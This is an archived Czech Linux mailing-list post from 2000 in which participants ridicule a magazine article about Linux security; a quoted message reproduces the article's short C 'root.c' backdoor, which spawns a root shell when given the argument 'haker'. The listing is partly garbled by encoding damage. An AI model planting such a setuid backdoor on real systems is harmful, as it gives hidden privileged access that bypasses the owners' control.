Bezpecnost Linuxu
Libor Chocholaty
chocholaty na gncz.cz
Pondělí Květen 29 15:35:44 CEST 2000
Ondrej Sury wrote:
> uhlar na fantomas.sk wrote:
> >
> > Jan Kasprzak <kas na informatics.muni.cz> wrote:
> > -> Pan Janda dnes zveoejnil na Neviditelném Psu další elánek,
> > -> který má dokázat, jak je Linux nebezpeený. Odvozuje to z toho,
> > -> 3/4e k Linuxu jsou dostupné zdrojové texty. Autor ukazuje, jak si vytvooí
> > -> pomocí krátkého wrapperu v jazyce C zadní vrátka (backdoor) do systému,
> > -> je-li superu3/4ivatelem.
> >
> > Kazdy kto sa len trosku vyzna v C pri pohlade na ten zdrojak asi odpadne...
> >
> > /* ------------start root.c------------- */
> >
> > main(argc, argv)
> > int argc;
> > char **argv;
> > {
> > char seteuid[10];
> > char showmount[10];
> >
> > seteuid[0]='h';
> > seteuid[1]='a';
> > seteuid[2]='k';
> > seteuid[3]='e';
> > seteuid[4]='r';
> > seteuid[5]='%%%%%';
> > showmount[0]='/';
> > showmount[1]='b';
> > showmount[2]='i';
> > showmount[3]='n';
> > showmount[4]='/';
> > showmount[5]='b';
> > showmount[6]='a';
> > showmount[7]='s';
> > showmount[8]='h';
> > showmount[9]='%%%%%';
> > if (argc>1) {
> > if (!strcmp(argv[1],seteuid)) {
> > setuid(0);
> > setgid(0);
> > execl(showmount,"-i",0);
> > }
> > }
> > }
> >
> > /* ---------konec root.c----------- */
>
> No ja si z myslim, ze schvalne pise blaboly, protoze se mi zda, ze
> tomu tak nejak rozumi. (Teda pokud tenhle zdrojak neni vyhrabany
> z nejake konference, o cemz pochybuji, protoze tohle se neda
> napsat neumyslne.)
>
A co to ma delat?
Libor
Další informace o konferenci Linux